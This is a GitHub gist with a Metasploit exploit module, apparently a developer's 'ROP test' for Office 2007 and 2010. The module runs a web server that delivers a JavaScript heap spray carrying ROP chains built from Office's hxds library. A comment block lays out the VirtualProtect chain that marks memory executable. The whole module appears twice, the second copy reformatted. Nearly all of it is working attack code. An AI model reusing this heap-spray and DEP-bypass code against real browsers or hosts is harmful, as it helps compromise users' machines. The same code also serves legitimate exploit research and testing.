wchen-r7/gist:6774619

## gistfile1.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ROP test",
      'Description'    => %q{
        ROP test for Office 2007 and Office 2010
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     => [ [ 'URL', 'http://metasploit.com' ] ],
      'Platform'       => 'win',
      'Targets'        => [ [ 'Automatic', {} ] ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))
  end

  def generate_hxds_chains
    p = "\x90" * 100
    {
      :office_2007 => generate_rop_payload('hxds', p, { 'target'=>'2007' }),
      :office_2010 => generate_rop_payload('hxds', p, { 'target'=>'2010' })
    }
  end

  def on_request_uri(cli, request)
    rops      = generate_hxds_chains
    layout    = rops[:office_2007] + rops[:office_2010]
    print_line
    print_line("\n" + Rex::Text.to_hex_dump(layout))
    js_layout = Rex::Text.to_unescape(layout)

    html = %Q|
<html>
<script>
#{js_property_spray}

function loadOffice() {
  try{location.href='ms-help://'} catch(e){}
}

window.onload = function() {
  loadOffice();

  // Target address for Office 2007 = 0x20302020
  // Target address for Office 2010 = 0x203020DC
  var s = unescape("#{js_layout}");
  sprayHeap({shellcode:s});
  alert("Ready. Check address 0x20302020 for Office 2007. 0x203020DC for Office 2010.");
}
</script>
</html>
    |

    print_status("ROPs sent. Check address 0x20302020 for Office 2007. 0x203020DC for Office 2010.")
    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
  end

end


=begin

VirtualProtect for office 2007 rop chain:

20302044   FFFFFFFF  ÿÿÿÿ  |hProcess = FFFFFFFF
20302048   20302074  t 0   |Address = 20302074
2030204C   00000201  ..  |Size = 201 (513.)
20302050   00000040  @...  |NewProtect = PAGE_EXECUTE_READWRITE


VirtualProtect for office 2010 rop chain:

20302108   FFFFFFFF  ÿÿÿÿ  |hProcess = FFFFFFFF
2030210C   20302138  8!0   |Address = 20302138
20302110   00000201  ..  |Size = 201 (513.)
20302114   00000040  @...  |NewProtect = PAGE_EXECUTE_READWRITE
20302118   51C5C638  8ÆÅQ  \pOldProtect = hxds.51C5C638


=end
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb

	def initialize(info={})
	super(update_info(info,
	'Name' => "ROP test",
	'Description' => %q{
	ROP test for Office 2007 and Office 2010
	},
	'License' => MSF_LICENSE,
	'Author' => [ 'sinn3r' ],
	'References' => [ [ 'URL', 'http://metasploit.com' ] ],
	'Platform' => 'win',
	'Targets' => [ [ 'Automatic', {} ] ],
	'Payload' =>
	{
	'BadChars' => "\x00",
	'StackAdjustment' => -3500
	},
	'Privileged' => false,
	'DisclosureDate' => "Apr 1 2013",
	'DefaultTarget' => 0))
	end

	def generate_hxds_chains
	p = "\x90" * 100
	{
	:office_2007 => generate_rop_payload('hxds', p, { 'target'=>'2007' }),
	:office_2010 => generate_rop_payload('hxds', p, { 'target'=>'2010' })
	}
	end

	def on_request_uri(cli, request)
	rops = generate_hxds_chains
	layout = rops[:office_2007] + rops[:office_2010]
	print_line
	print_line("\n" + Rex::Text.to_hex_dump(layout))
	js_layout = Rex::Text.to_unescape(layout)

	html = %Q\|
	<html>
	<script>
	#{js_property_spray}

	function loadOffice() {
	try{location.href='ms-help://'} catch(e){}
	}

	window.onload = function() {
	loadOffice();

	// Target address for Office 2007 = 0x20302020
	// Target address for Office 2010 = 0x203020DC
	var s = unescape("#{js_layout}");
	sprayHeap({shellcode:s});
	alert("Ready. Check address 0x20302020 for Office 2007. 0x203020DC for Office 2010.");
	}
	</script>
	</html>
	\|

	print_status("ROPs sent. Check address 0x20302020 for Office 2007. 0x203020DC for Office 2010.")
	send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
	end

	end


	=begin

	VirtualProtect for office 2007 rop chain:

	20302044 FFFFFFFF ÿÿÿÿ \|hProcess = FFFFFFFF
	20302048 20302074 t 0 \|Address = 20302074
	2030204C 00000201 .. \|Size = 201 (513.)
	20302050 00000040 @... \|NewProtect = PAGE_EXECUTE_READWRITE


	VirtualProtect for office 2010 rop chain:

	20302108 FFFFFFFF ÿÿÿÿ \|hProcess = FFFFFFFF
	2030210C 20302138 8!0 \|Address = 20302138
	20302110 00000201 .. \|Size = 201 (513.)
	20302114 00000040 @... \|NewProtect = PAGE_EXECUTE_READWRITE
	20302118 51C5C638 8ÆÅQ \pOldProtect = hxds.51C5C638



	=end